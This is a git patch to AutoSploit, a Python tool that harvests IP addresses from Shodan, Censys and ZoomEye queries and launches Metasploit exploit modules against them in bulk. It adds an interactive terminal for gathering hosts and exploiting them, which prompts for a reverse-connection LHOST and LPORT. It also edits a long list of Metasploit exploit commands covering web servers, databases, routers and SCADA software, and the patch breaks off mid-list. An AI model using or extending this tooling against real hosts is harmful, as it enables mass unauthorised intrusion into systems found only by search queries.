From 38e732988f1e4d6c0aa785926a5c8ab0f53fae55 Mon Sep 17 00:00:00 2001 From: ekultek Date: Mon, 26 Feb 2018 18:49:39 -0600 Subject: [PATCH 1/2] created a terminal output for the program that implements #64 and #49 --- etc/{ => text_files}/general | 0 lib/exploitation/__init__.py | 0 lib/exploitation/exploiter.py | 0 lib/term/__init__.py | 0 lib/term/terminal.py | 288 ++++++++++++++++++++++++++++++++++ 5 files changed, 288 insertions(+) rename etc/{ => text_files}/general (100%) create mode 100644 lib/exploitation/__init__.py create mode 100644 lib/exploitation/exploiter.py create mode 100644 lib/term/__init__.py create mode 100644 lib/term/terminal.py diff --git a/etc/general b/etc/text_files/general similarity index 100% rename from etc/general rename to etc/text_files/general diff --git a/lib/exploitation/__init__.py b/lib/exploitation/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py new file mode 100644 index 0000000..e69de29 diff --git a/lib/term/__init__.py b/lib/term/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/lib/term/terminal.py b/lib/term/terminal.py new file mode 100644 index 0000000..a7eb526 --- /dev/null +++ b/lib/term/terminal.py @@ -0,0 +1,288 @@ +import os +import sys +# import threading + +import lib.settings +import lib.output +import lib.exploitation.exploiter +import api_calls.shodan +import api_calls.zoomeye +import api_calls.censys + + +stop_animation = False + + +class AutoSploitTerminal(object): + + """ + class object for the main terminal of the program + """ + + def __init__(self, tokens): + self.tokens = tokens + self.usage_path = lib.settings.USAGE_AND_LEGAL_PATH + self.host_path = lib.settings.HOST_FILE + self.sep = "-" * 30 + + def usage_and_legal(self): + """ + shows a display of the output and legal information that resides + in the etc/text_files/general file. + + option 1 must be provided to display + """ + lib.output.info("preparing to display usage and legal") + with open(self.usage_path) as usage: + print(usage.read().strip()) + + def help(self, command): + """ + print the help of the commands + """ + help_dict = { + "usage": self.usage_and_legal, + "view": self.view_gathered_hosts, + "single": self.add_single_host, + "exit": self.quit, + "gather": self.gather_hosts, + "exploit": self.exploit_gathered_hosts, + "custom": self.custom_host_list + } + for key in help_dict.keys(): + if command == key: + lib.output.info("help found for provided argument:") + print(self.sep) + print(help_dict[key].__doc__) + print(self.sep) + break + else: + lib.output.warning("unable to find help for provided command '{}'".format(command)) + lib.output.info("available helps '{}'".format( + ", ".join([k for k in help_dict.keys()]) + )) + + def view_gathered_hosts(self): + """ + print a list of all available hosts in the hosts.txt file + + option 5 must be provided + """ + lib.output.info("loading gathered hosts from {}".format(self.host_path)) + with open(self.host_path) as hosts: + for host in hosts.readlines(): + lib.output.info(host.strip()) + + def add_single_host(self): + """ + add a singluar host to the hosts.txt file and check if the host + will resolve to a true IP address, if it is not a true IP address + you will be re-prompted for an IP address + + option 4 must be provided + """ + provided = False + while not provided: + new_host = lib.output.prompt("enter the host IP you wish to add", lowercase=False) + if not lib.settings.validate_ip_addr(new_host): + lib.output.warning("provided host does not appear to be a true IP, try again") + else: + with open(self.host_path, "a+") as hosts: + hosts.write(new_host + os.linesep) + lib.output.info("successfully wrote provided host to {}".format(self.host_path)) + break + + def quit(self, status): + """ + quits the terminal and exits the program entirely + + option 99 must be provided + """ + lib.output.error("aborting terminal session") + assert isinstance(status, int) + sys.exit(status) + + def gather_hosts(self, query, given_choice=None): + """ + gather hosts from either Shodan, Zoomeye, Censys, or multiple + by providing a comma between integers. + + option 2 must be provided + """ + global stop_animation + + choice_dict = { + 1: api_calls.shodan.ShodanAPIHook, + 2: api_calls.zoomeye.ZoomEyeAPIHook, + 3: api_calls.censys.CensysAPIHook + } + searching = False + if given_choice is None: + lib.output.info("please choose an API to gather from (choosing two " + "separate by comma IE; 1,2)") + for i, api in enumerate(lib.settings.API_URLS.keys(), start=1): + print("{}. {}".format(i, api.title())) + choice = raw_input(lib.settings.AUTOSPLOIT_PROMPT) + else: + choice = given_choice + while not searching: + try: + choice = int(choice) + # t = threading.Thread( + # target=lib.settings.animation, + # args=("performing lookup for provided query '{}'".format(query),) + # ) + # t.daemon = True + # t.start() + if choice == 1: + choice_dict[choice](self.tokens["shodan"][0], query).shodan() + # stop_animation = True + break + elif choice == 2: + choice_dict[choice](query).zoomeye() + # stop_animation = True + break + elif choice == 3: + choice_dict[choice](self.tokens["censys"][1], self.tokens["censys"][0], query).censys() + # stop_animation = True + break + else: + lib.output.warning("invalid option provided") + except (ValueError, KeyError): + if "," in choice: + for i in choice.split(","): + if int(i) in choice_dict.keys(): + self.gather_hosts(query, given_choice=int(i)) + else: + lib.output.warning("invalid option, skipping") + break + break + else: + lib.output.warning("must be integer between 1-{} not string".format(len(lib.settings.API_URLS.keys()))) + self.gather_hosts(query) + + def exploit_gathered_hosts(self, loaded_mods, hosts=None): + """ + exploit already gathered hosts from the hosts.txt file + + option 6 must be provided + """ + ruby_exec = False + msf_path = None + if hosts is None: + hosts = open(self.host_path).readlines() + if not lib.settings.check_for_msf(): + msf_path = lib.output.prompt( + "it appears that MSF is not in your PATH, provide the full path to it" + ) + ruby_exec = True + lib.output.info( + "you will need to do some configuration to MSF.\n" + "please keep in mind that sending connections back to " + "your local host is probably not a smart idea." + ) + configuration = ( + lib.output.prompt("enter your workspace name", lowercase=False), + lib.output.prompt("enter your LHOST", lowercase=False), + lib.output.prompt("enter your LPORT", lowercase=False) + ) + exploiter = lib.exploitation.exploiter.AutoSploitExploiter( + open(lib.settings.HOST_FILE).readlines(), + configuration, + loaded_mods, + ruby_exec=ruby_exec, + msf_path=msf_path + ) + sorted_mods = exploiter.sort_modules_by_query() + choice = lib.output.prompt( + "a total of {} modules have been sorted by relevance, would you like to display them[y/N]".format( + len(sorted_mods) + ) + ) + if not choice.lower().strip().startswith("y"): + mods = lib.output.prompt("use relevant modules[y/N]") + if mods.lower().startswith("n"): + lib.output.info("starting exploitation with all loaded modules (total of {})".format(len(loaded_mods))) + exploiter.start_exploit(loaded_mods, hosts) + elif mods.lower().startswith("y"): + lib.output.info("starting exploitation with sorted modules (total of {})".format(len(sorted_mods))) + exploiter.start_exploit(sorted_mods, hosts) + else: + exploiter.view_sorted() + mods = lib.output.prompt("use relevant modules[y/N]") + if mods.lower().startswith("n"): + lib.output.info("starting exploitation with all loaded modules (total of {})".format(len(loaded_mods))) + exploiter.start_exploit(loaded_mods, hosts) + elif mods.lower().startswith("y"): + lib.output.info("starting exploitation with sorted modules (total of {})".format(len(sorted_mods))) + exploiter.start_exploit(sorted_mods, hosts) + + def custom_host_list(self, mods): + """ + provided a custom host list that will be used for exploitation + + option 3 must be provided + """ + provided_host_file = lib.output.prompt("enter the full path to your host file", lowercase=False) + self.exploit_gathered_hosts(mods, hosts=provided_host_file) + + def terminal_main_display(self, loaded_mods): + """ + main output of the terminal + """ + lib.output.info("welcome to AutoSploit, choose an option, type 99 to quit") + selected = False + + try: + while not selected: + for i in lib.settings.AUTOSPLOIT_TERM_OPTS.keys(): + print("{}. {}".format(i, lib.settings.AUTOSPLOIT_TERM_OPTS[i].title())) + choice = raw_input(lib.settings.AUTOSPLOIT_PROMPT) + try: + choice = int(choice) + if choice == 99: + print(self.sep) + self.quit(0) + print(self.sep) + elif choice == 6: + print(self.sep) + self.exploit_gathered_hosts(loaded_mods) + print(self.sep) + elif choice == 5: + print(self.sep) + self.view_gathered_hosts() + print(self.sep) + elif choice == 4: + print(self.sep) + self.add_single_host() + print(self.sep) + elif choice == 3: + print(self.sep) + self.custom_host_list(loaded_mods) + print(self.sep) + elif choice == 2: + print(self.sep) + query = lib.output.prompt("enter your search query", lowercase=False) + self.gather_hosts(query) + print(self.sep) + elif choice == 1: + print(self.sep) + self.usage_and_legal() + else: + lib.output.warning("invalid option provided") + except ValueError: + if not choice == "help": + if "help" in choice: + try: + help_arg = choice.split(" ") + self.help(help_arg[-1]) + except: + lib.output.error("choice must be integer not string") + else: + lib.output.warning("option must be integer not string") + elif choice == "help": + lib.output.error("must provide an argument for help IE 'help exploit'") + + except KeyboardInterrupt: + print("\n") + self.terminal_main_display(loaded_mods) \ No newline at end of file From afc6567666ff30ff004c70726f8b57093dc8fa66 Mon Sep 17 00:00:00 2001 From: ekultek Date: Mon, 26 Feb 2018 18:51:27 -0600 Subject: [PATCH 2/2] moved some stuff to settings, created a class for the exploitation so it is easier to mess with, edited the modules and removed -j and use #54, added new args to the available options, edited the api's by adding a description of what is happening at the time of the execution, a couple edits to autosploit.py --- api_calls/censys.py | 6 +- api_calls/shodan.py | 6 +- api_calls/zoomeye.py | 6 +- autosploit.py | 84 +---- etc/json/default_modules.json | 570 +++++++++++++++++----------------- lib/cmdline/cmd.py | 4 + lib/exploitation/exploiter.py | 42 +++ lib/settings.py | 81 ++++- 8 files changed, 425 insertions(+), 374 deletions(-) diff --git a/api_calls/censys.py b/api_calls/censys.py index 7a73b35..edf8128 100644 --- a/api_calls/censys.py +++ b/api_calls/censys.py @@ -1,7 +1,10 @@ import requests from lib.errors import AutoSploitAPIConnectionError -from lib.output import error +from lib.output import ( + error, + info +) from lib.settings import ( HOST_FILE, API_URLS, @@ -25,6 +28,7 @@ def censys(self): """ connect to the Censys API and pull all IP addresses from the provided query """ + info("searching Censys with given query '{}'".format(self.query)) discovered_censys_hosts = set() try: req = requests.post(API_URLS["censys"], auth=(self.id, self.token), json={"query": self.query}) diff --git a/api_calls/shodan.py b/api_calls/shodan.py index f7277fa..0736cfc 100644 --- a/api_calls/shodan.py +++ b/api_calls/shodan.py @@ -3,7 +3,10 @@ import requests from lib.errors import AutoSploitAPIConnectionError -from lib.output import error +from lib.output import ( + error, + info +) from lib.settings import ( API_URLS, HOST_FILE, @@ -27,6 +30,7 @@ def shodan(self): """ connect to the API and grab all IP addresses associated with the provided query """ + info("searching Shodan with given query '{}'".format(self.query)) discovered_shodan_hosts = set() try: req = requests.get(API_URLS["shodan"].format(query=self.query, token=self.token)) diff --git a/api_calls/zoomeye.py b/api_calls/zoomeye.py index 2ddb3e1..cb9dab2 100644 --- a/api_calls/zoomeye.py +++ b/api_calls/zoomeye.py @@ -5,7 +5,10 @@ import requests from lib.errors import AutoSploitAPIConnectionError -from lib.output import error +from lib.output import ( + error, + info +) from lib.settings import ( API_URLS, HOST_FILE, @@ -56,6 +59,7 @@ def zoomeye(self): connect to the API and pull all the IP addresses that are associated with the given query """ + info("searching ZoomEye with given query '{}'".format(self.query)) discovered_zoomeye_hosts = set() try: token = self.__get_auth() diff --git a/autosploit.py b/autosploit.py index 6871798..9cdd195 100644 --- a/autosploit.py +++ b/autosploit.py @@ -34,10 +34,12 @@ from lib.settings import ( validate_ip_addr, check_services, + cmdline, load_api_keys, PLATFORM_PROMPT, AUTOSPLOIT_PROMPT, - AUTOSPLOIT_TERM_OPTS + AUTOSPLOIT_TERM_OPTS, + USAGE_AND_LEGAL_PATH ) from lib.output import ( info, @@ -55,7 +57,6 @@ local_host = "" configured = False toolbar_width = 60 -usage_and_legal_path = "{}/etc/general".format(os.getcwd()) loaded_exploits = load_exploits("{}/etc/json".format(os.getcwd())) stop_animation = False @@ -91,32 +92,12 @@ def animation(text): def usage(): """Usage & Legal.""" - global usage_and_legal_path print("\033[H\033[J") # Clear terminal logo() - with open(usage_and_legal_path) as info: + with open(USAGE_AND_LEGAL_PATH) as info: print(info.read()) -def cmdline(command): - """ - Function that allows us to store system command output in a variable. - We'll change this later in order to solve the potential security - risk that arises when passing untrusted input to the shell. - - I intend to have the issue resolved by Version 1.5.0. - """ - - command = shlex.split(command) - - process = subprocess.Popen( - args=command, - stdout=subprocess.PIPE, - shell=True - ) - return process.communicate()[0] - - def exploit(query=None, single=None): """Exploit component""" @@ -557,63 +538,6 @@ def try_shodan(): if __name__ == "__main__": - '''from api_calls import ( - shodan, - censys, - zoomeye - ) - from lib.settings import ( - load_api_keys, - API_URLS, - AUTOSPLOIT_PROMPT - ) - - from lib.output import ( - prompt, - info, - warning - ) - - tokens = load_api_keys() - - possible_apis = API_URLS.keys() - - def get_query(): - query = prompt("enter your search query") - return query - - selected = False - info_msg = "searching {} API with query '{}'" - info("pick a search engine") - for i, api in enumerate(sorted(possible_apis), start=1): - print("{}. {}".format(i, api)) - - while not selected: - choice = raw_input(AUTOSPLOIT_PROMPT) - try: - choice = int(choice) - if choice == 1: - selected = True - query = get_query() - info(info_msg.format("Shodan", query)) - censys.CensysAPIHook(tokens["censys"][1], tokens["censys"][0], query).censys() - elif choice == 2: - selected = True - query = get_query() - info(info_msg.format("Censys", query)) - shodan.ShodanAPIHook(tokens["shodan"][0], query).shodan() - elif choice == 3: - query = get_query() - selected = True - info("ZoomEye token will be loaded automatically") - info(info_msg.format("Zoomeye", query)) - zoomeye.ZoomEyeAPIHook(query).zoomeye() - else: - warning("choice must be between 1-{}".format(len(API_URLS.keys()))) - except: - warning("choice must be integer not string")''' - - logo() if len(sys.argv) > 1: diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index 91a629e..ca7f102 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json @@ -1,289 +1,289 @@ { "exploits": [ - "use exploit/windows/firewall/blackice_pam_icq; exploit -j;", - "use exploit/windows/ftp/ms09_053_ftpd_nlst;exploit -j;", - "use exploit/windows/http/amlibweb_webquerydll_app;exploit -j;", - "use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;", - "use exploit/windows/http/umbraco_upload_aspx;exploit -j;", - "use exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit -j;", - "use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;", - "use exploit/windows/iis/ms01_023_printer;exploit -j;", - "use exploit/windows/iis/ms01_026_dbldecode;exploit -j;", - "use exploit/windows/iis/ms01_033_idq;exploit -j;", - "use exploit/windows/iis/ms02_018_htr;exploit -j;", - "use exploit/windows/iis/ms02_065_msadc;exploit -j;", - "use exploit/windows/iis/ms03_007_ntdll_webdav;exploit -j;", - "use exploit/windows/iis/msadc;exploit -j;", - "use exploit/windows/isapi/ms00_094_pbserver;exploit -j;", - "use exploit/windows/isapi/ms03_022_nsiislog_post;exploit -j;", - "use exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit -j;", - "use exploit/windows/isapi/rsa_webagent_redirect;exploit -j;", - "use exploit/windows/isapi/w3who_query;exploit -j;", - "use exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit -j;", - "use exploit/windows/ssl/ms04_011_pct;exploit -j;", - "use exploit/freebsd/http/watchguard_cmd_exec;exploit -j; ", - "use exploit/linux/http/alienvault_exec;exploit -j; ", - "use exploit/linux/http/alienvault_sqli_exec;exploit -j; ", - "use exploit/linux/http/astium_sqli_upload;exploit -j; ", - "use exploit/linux/http/centreon_sqli_exec;exploit -j; ", - "use exploit/linux/http/centreon_useralias_exec;exploit -j; ", - "use exploit/linux/http/crypttech_cryptolog_login_exec;exploit -j; ", - "use exploit/linux/http/dolibarr_cmd_exec;exploit -j; ", - "use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;", - "use exploit/linux/http/kloxo_sqli;exploit -j; ", - "use exploit/linux/http/nagios_xi_chained_rce;exploit -j; ", - "use exploit/linux/http/netgear_wnr2000_rce;exploit -j; ", - "use exploit/linux/http/pandora_fms_sqli;exploit -j; ", - "use exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit -j; ", - "use exploit/linux/http/wd_mycloud_multiupload_upload;exploit -j; ", - "use exploit/linux/http/zabbix_sqli;exploit -j; ", - "use exploit/linux/misc/qnap_transcode_server;exploit -j; ", - "use exploit/linux/mysql/mysql_yassl_getname;exploit -j; ", - "use exploit/linux/mysql/mysql_yassl_hello;exploit -j; ", - "use exploit/linux/postgres/postgres_payload;exploit -j; ", - "use exploit/linux/samba/is_known_pipename;exploit -j; ", - "use exploit/multi/browser/java_jre17_driver_manager;exploit -j; ", - "use exploit/multi/http/atutor_sqli;exploit -j; ", - "use exploit/multi/http/dexter_casinoloader_exec;exploit -j; ", - "use exploit/multi/http/drupal_drupageddon;exploit -j; ", - "use exploit/multi/http/manage_engine_dc_pmp_sqli;exploit -j; ", - "use exploit/multi/http/manageengine_search_sqli;exploit -j; ", - "use exploit/multi/http/movabletype_upgrade_exec;exploit -j; ", - "use exploit/multi/http/php_volunteer_upload_exe;exploit -j; ", - "use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit -j; ", - "use exploit/multi/http/splunk_mappy_exec;exploit -j; ", - "use exploit/multi/http/testlink_upload_exec;exploit -j; ", - "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; ", - "use exploit/multi/misc/legend_bot_exec;exploit -j; ", - "use exploit/multi/mysql/mysql_udf_payload;exploit -j; ", - "use exploit/multi/postgres/postgres_createlang;exploit -j; ", - "use exploit/solaris/sunrpc/ypupdated_exec;exploit -j; ", - "use exploit/unix/ftp/proftpd_133c_backdoor;exploit -j; ", - "use exploit/unix/http/tnftp_savefile;exploit -j; ", - "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; ", - "use exploit/unix/webapp/kimai_sqli;exploit -j; ", - "use exploit/unix/webapp/openemr_sqli_privesc_upload;exploit -j; ", - "use exploit/unix/webapp/seportal_sqli_exec;exploit -j; ", - "use exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit -j; ", - "use exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit -j;", - "use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; ", - "use exploit/windows/http/apache_mod_rewrite_ldap;exploit -j; ", - "use exploit/windows/http/ca_totaldefense_regeneratereports;exploit -j;", - "use exploit/windows/http/cyclope_ess_sqli;exploit -j;", - "use exploit/windows/http/hp_mpa_job_acct;exploit -j;", - "use exploit/windows/http/solarwinds_storage_manager_sql;exploit -j;", - "use exploit/windows/http/sonicwall_scrutinizer_sql;exploit -j;", - "use exploit/windows/misc/altiris_ds_sqli;exploit -j; ", - "use exploit/windows/misc/fb_cnct_group;exploit -j; ", - "use exploit/windows/misc/lianja_db_net;exploit -j; ", - "use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; ", - "use exploit/windows/mssql/lyris_listmanager_weak_pass;exploit -j; ", - "use exploit/windows/mssql/ms02_039_slammer;exploit -j; ", - "use exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit -j; ", - "use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit -j; ", - "use exploit/windows/mssql/mssql_linkcrawler;exploit -j; ", - "use exploit/windows/mssql/mssql_payload;exploit -j; ", - "use exploit/windows/mssql/mssql_payload_sqli;exploit -j; ", - "use exploit/windows/mysql/mysql_mof;exploit -j; ", - "use exploit/windows/mysql/mysql_start_up;exploit -j; ", - "use exploit/windows/mysql/mysql_yassl_hello;exploit -j;", - "use exploit/windows/mysql/scrutinizer_upload_exec;exploit -j; ", - "use exploit/windows/postgres/postgres_payload;exploit -j; ", - "use exploit/windows/scada/realwin_on_fcs_login;exploit -j;", - "use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;", - "use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;", - "use exploit/multi/http/rails_json_yaml_code_exec;exploit -j;", - "use exploit/multi/http/rails_secret_deserialization;exploit -j;", - "use exploit/multi/http/rails_web_console_v2_code_exec;exploit -j;", - "use exploit/multi/http/rails_xml_yaml_code_exec;exploit -j;", - "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;", - "use exploit/multi/http/phpmoadmin_exec;exploit -j;", - "use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;", - "use exploit/multi/http/phpmyadmin_preg_replace;exploit -j;", - "use exploit/multi/http/phpscheduleit_start_date;exploit -j;", - "use exploit/multi/http/phptax_exec;exploit -j;", - "use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;", - "use exploit/multi/http/plone_popen2;exploit -j;", - "use exploit/multi/http/pmwiki_pagelist;exploit -j;", - "use exploit/multi/http/joomla_http_header_rce;exploit -j;", - "use exploit/multi/http/novell_servicedesk_rce;exploit -j;", - "use exploit/multi/http/oracle_reports_rce;exploit -j;", - "use exploit/multi/http/php_utility_belt_rce;exploit -j;", - "use exploit/multi/http/phpfilemanager_rce;exploit -j;", - "use exploit/multi/http/processmaker_exec;exploit -j;", - "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;", - "use exploit/multi/http/spree_search_exec;exploit -j;", - "use exploit/multi/http/spree_searchlogic_exec;exploit -j;", - "use exploit/multi/http/struts_code_exec_parameters;exploit -j;", - "use exploit/multi/http/vtiger_install_rce;exploit -j;", - "use exploit/multi/http/werkzeug_debug_rce;exploit -j;", - "use exploit/multi/http/zemra_panel_rce;exploit -j;", - "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;", - "use exploit/multi/http/joomla_http_header_rce;exploit -j;", - "use exploit/unix/webapp/joomla_akeeba_unserialize;exploit -j;", - "use exploit/unix/webapp/joomla_comjce_imgmanager;exploit -j;", - "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;", - "use exploit/unix/webapp/joomla_media_upload_exec;exploit -j;", - "use exploit/multi/http/builderengine_upload_exec;exploit -j;", - "use exploit/multi/http/caidao_php_backdoor_exec;exploit -j;", - "use exploit/multi/http/atutor_sqli;exploit -j; ", - "use exploit/multi/http/ajaxplorer_checkinstall_exec;exploit -j;", - "use exploit/multi/http/apache_activemq_upload_jsp;exploit -j; ", - "use exploit/unix/webapp/wp_lastpost_exec;exploit -j; ", - "use exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit -j;", - "use exploit/multi/http/axis2_deployer;exploit -j;", - "use exploit/unix/webapp/wp_foxypress_upload;exploit -j;", - "use exploit/linux/http/tr064_ntpserver_cmdinject;exploit -j;", - "use exploit/linux/misc/quest_pmmasterd_bof;exploit -j;", - "use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit -j;", - "use exploit/unix/webapp/php_xmlrpc_eval;exploit -j;", - "use exploit/unix/webapp/wp_admin_shell_upload;exploit -j;", - "use exploit/linux/http/sophos_wpa_sblistpack_exec;exploit -j;", - "use exploit/linux/local/sophos_wpa_clear_keys;exploit -j;", - "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;", - "use auxiliary/admin/cisco/cisco_asa_extrabacon;exploit -j;", - "use auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit -j;", - "use auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit -j;", - "use exploit/bsdi/softcart/mercantec_softcart;exploit -j; ", - "use exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit -j;", - "use exploit/freebsd/samba/trans2open;exploit -j;", - "use exploit/linux/ftp/proftp_sreplace;exploit -j; ", - "use exploit/linux/http/dcos_marathon;exploit -j;", - "use exploit/linux/http/f5_icall_cmd;exploit -j;", - "use exploit/linux/http/fritzbox_echo_exec;exploit -j;", - "use exploit/linux/http/gitlist_exec;exploit -j;", - "use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;", - "use exploit/linux/http/ipfire_bashbug_exec;exploit -j;", - "use exploit/linux/http/ipfire_oinkcode_exec;exploit -j;", - "use exploit/linux/http/ipfire_proxy_exec;exploit -j;", - "use exploit/linux/http/kaltura_unserialize_rce;exploit -j;", - "use exploit/linux/http/lifesize_uvc_ping_rce;exploit -j;", - "use exploit/linux/http/nagios_xi_chained_rce;exploit -j;", - "use exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit -j;", - "use exploit/linux/http/netgear_wnr2000_rce ;exploit -j;", - "use exploit/linux/http/nuuo_nvrmini_auth_rce;exploit -j;", - "use exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit -j;", - "use exploit/linux/http/op5_config_exec;exploit -j;", - "use exploit/linux/http/pandora_fms_exec;exploit -j;", - "use exploit/linux/http/pineapple_preconfig_cmdinject;exploit -j;", - "use exploit/linux/http/seagate_nas_php_exec_noauth;exploit -j;", - "use exploit/linux/http/symantec_messaging_gateway_exec;exploit -j;", - "use exploit/linux/http/trendmicro_imsva_widget_exec;exploit -j;", - "use exploit/linux/http/trueonline_billion_5200w_rce;exploit -j;", - "use exploit/linux/http/trueonline_p660hn_v1_rce;exploit -j;", - "use exploit/linux/http/trueonline_p660hn_v2_rce;exploit -j;", - "use exploit/linux/http/vcms_upload;exploit -j;", - "use exploit/linux/misc/lprng_format_string;exploit -j;", - "use exploit/linux/misc/mongod_native_helper;exploit -j;", - "use exploit/linux/misc/ueb9_bpserverd;exploit -j;", - "use exploit/linux/mysql/mysql_yassl_getname;exploit -j;", - "use exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit -j;", - "use exploit/linux/postgres/postgres_payload;exploit -j;", - "use exploit/linux/pptp/poptop_negative_read;exploit -j;", - "use exploit/linux/proxy/squid_ntlm_authenticate;exploit -j;", - "use exploit/linux/samba/lsa_transnames_heap;exploit -j;", - "use exploit/linux/samba/setinfopolicy_heap;exploit -j;", - "use exploit/linux/samba/trans2open;exploit -j;", - "use exploit/multi/elasticsearch/script_mvel_rce;exploit -j;", - "use exploit/multi/elasticsearch/search_groovy_script;exploit -j;", - "use exploit/multi/http/atutor_sqli;exploit -j;", - "use exploit/multi/http/axis2_deployer;exploit -j;", - "use exploit/multi/http/familycms_less_exe;exploit -j;", - "use exploit/multi/http/freenas_exec_raw;exploit -j;", - "use exploit/multi/http/gestioip_exec;exploit -j;", - "use exploit/multi/http/glassfish_deployer;exploit -j;", - "use exploit/multi/http/glpi_install_rce;exploit -j;", - "use exploit/multi/http/joomla_http_header_rce;exploit -j; ", - "use exploit/multi/http/makoserver_cmd_exec;exploit -j;", - "use exploit/multi/http/novell_servicedesk_rc;exploit -j;", - "use exploit/multi/http/oracle_reports_rce;exploit -j;", - "use exploit/multi/http/php_utility_belt_rce;exploit -j;", - "use exploit/multi/http/phpfilemanager_rce;exploit -j;", - "use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;", - "use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;", - "use exploit/multi/http/processmaker_exec;exploit -j;", - "use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;", - "use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;", - "use exploit/multi/http/rails_secret_deserialization;exploit -j;", - "use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;", - "use exploit/multi/http/simple_backdoors_exec;exploit -j;", - "use exploit/multi/http/spree_search_exec;exploit -j;", - "use exploit/multi/http/spree_searchlogic_exec;exploit -j;", - "use exploit/multi/http/struts2_rest_xstream;exploit -j;", - "use exploit/multi/http/struts_code_exec;exploit -j;", - "use exploit/multi/http/struts_code_exec_classloader;exploit -j;", - "use exploit/multi/http/struts_code_exec_parameters;exploit -j;", - "use exploit/multi/http/struts_dev_mode;exploit -j;", - "use exploit/multi/http/sysaid_auth_file_upload;exploit -j;", - "use exploit/multi/http/tomcat_jsp_upload_bypass;exploit -j;", - "use exploit/multi/http/vtiger_install_rce;exploit -j;", - "use exploit/multi/http/werkzeug_debug_rce;exploit -j;", - "use exploit/multi/http/zemra_panel_rce;exploit -j;", - "use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;", - "use exploit/multi/ids/snort_dce_rpc;exploit -j;", - "use exploit/multi/misc/batik_svg_java;exploit -j;", - "use exploit/multi/misc/pbot_exec;exploit -j;", - "use exploit/multi/misc/veritas_netbackup_cmdexec;exploit -j;", - "use exploit/multi/mysql/mysql_udf_payload;exploit -j;", - "use exploit/multi/php/php_unserialize_zval_cookie;exploit -j;", - "use exploit/unix/http/freepbx_callmenum;exploit -j;", - "use exploit/unix/http/lifesize_room;exploit -j;", - "use exploit/unix/http/pfsense_clickjacking;exploit -j;", - "use exploit/unix/http/pfsense_group_member_exec;exploit -j;", - "use exploit/unix/http/tnftp_savefile;exploit -j;", - "use exploit/unix/misc/polycom_hdx_traceroute_exec;exploit -j;", - "use exploit/unix/webapp/awstats_migrate_exec;exploit -j;", - "use exploit/unix/webapp/carberp_backdoor_exec;exploit -j;", - "use exploit/unix/webapp/citrix_access_gateway_exec;exploit -j;", - "use exploit/unix/webapp/dogfood_spell_exec;exploit -j;", - "use exploit/unix/webapp/invision_pboard_unserialize_exec;exploit -j;", - "use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;", - "use exploit/unix/webapp/mybb_backdoor;exploit -j;", - "use exploit/unix/webapp/opensis_modname_exec;exploit -j;", - "use exploit/unix/webapp/oscommerce_filemanager;exploit -j;", - "use exploit/unix/webapp/piwik_superuser_plugin_upload;exploit -j;", - "use exploit/unix/webapp/tikiwiki_upload_exec;exploit -j;", - "use exploit/unix/webapp/webtester_exec;exploit -j;", - "use exploit/unix/webapp/wp_phpmailer_host_header;exploit -j;", - "use exploit/unix/webapp/wp_total_cache_exec;exploit -j;", - "use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j;", - "use exploit/windows/http/ektron_xslt_exec;exploit -j;", - "use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;", - "use exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit -j;", - "use exploit/windows/http/hp_autopass_license_traversal;exploit -j;", - "use exploit/windows/http/manage_engine_opmanager_rce;exploit -j;", - "use exploit/windows/http/netgear_nms_rce;exploit -j;", - "use exploit/windows/http/sepm_auth_bypass_rce;exploit -j;", - "use exploit/windows/http/trendmicro_officescan_widget_exec;exploit -j;", - "use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;", - "use exploit/windows/iis/msadc;exploit -j;", - "use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j;", - "use exploit/windows/novell/file_reporter_fsfui_upload;exploit -j;", - "use exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit -j;", - "use exploit/windows/smb/ipass_pipe_exec;exploit -j;", - "use exploit/windows/smb/smb_relay;exploit -j;", - "use 